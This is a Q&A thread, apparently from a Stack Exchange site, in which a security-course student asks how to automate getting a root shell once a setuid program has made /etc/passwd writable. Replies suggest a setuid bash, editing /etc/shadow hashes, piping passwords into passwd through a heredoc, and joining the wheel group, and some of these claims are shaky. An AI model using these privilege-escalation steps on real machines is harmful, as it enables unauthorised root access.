2

I am working on an exploit for a security course. The object is to obtain a root shell in a linux virtual machine. So far, I can write to /etc/passwd and change root's password to an arbitrary string.

Now, I want to use su to get the root shell. Since my exploit has to be automated, it can't prompt for a password, and the vm doesn't have expect installed. Does anybody have any idea how I can pass the password to the su command? Or is there a better way?

Oliver Salzburg
  • 86,445
  • 63
  • 260
  • 306
noobler
  • 157
  • 2
  • 5
  • 1
    If you are able to write to /etc/passwd, then surely you have already elevated to root? In that case, couldn't you setuid on /bin/bash and run it? – Paul Jan 24 '12 at 22:50
  • I don't have root on the vm. We are to exploit a given backup program that has setuid set. By passing it malicious arguments I can get it to change the owner of /etc/passwd. – noobler Jan 25 '12 at 03:16
  • Can you pass the setuid process malicious arguments to do a setuid on /bin/bash? – Paul Jan 25 '12 at 03:31
  • @noobler Do you have the source for the backup program? If not, you need to find a buffer overflow by trial and error. `su` opens /dev/tty to read the password. You need to find a way to persuade `su` to use your very own /dev/tty. – ott-- May 23 '12 at 20:35
  • If you can have the setuid program call `chmod` to change permissions of /etc/password as root, why can't you just have the setuid program call `/bin/bash` to spawn a root shell? – LawrenceC Jul 21 '20 at 17:13

2 Answers2

0

The best ways to automate this type of input, is using expect or better pexpect. most servers come with python, at least with a modern distribution.

First off you said your VM does not have expect installed? I'm not sure why that matters. Is there any reason why you cannot install/execute something, under your local account?

Next consideration, why must you even use passwd??? You can also change a password by replacing the hash specified in /etc/shadow. You obviously would need to correctly pregenerate a hash first, but as long as you use a supported one it should work as expected. Now how you would script such an action, that's an exercise for you to work out.

I also want to mention, passwd does not read it's input from STDIN. If i'm not mistaken, it reads from a tty. So no fancy combo of just echo and sleep would work. However it's possible using a HEREDOC, but assumes system is sufficiently responsive. You may be able to break it up and sleep between entires. I just tested this, it worked on my Ubuntu workstation.

#!/bin/bash
passwd root <<'EOF'
newpassword
newpassword
EOF
J. M. Becker
  • 633
  • 6
  • 15
-2

Your exploit could also write to the groups file and make the current user part of the 'wheel' group (or whatever group can run sudo commands w/o a password). Then you'll be able to sudo su root (or any other user) w/o a password.

Running visudo should give you some direction on the setup of the 'wheel' group on your machine.

To clarify: once a user becomes part of the wheel group, they can run sudo commands without needing a password.

CamelBlues
  • 285
  • 1
  • 4
  • 12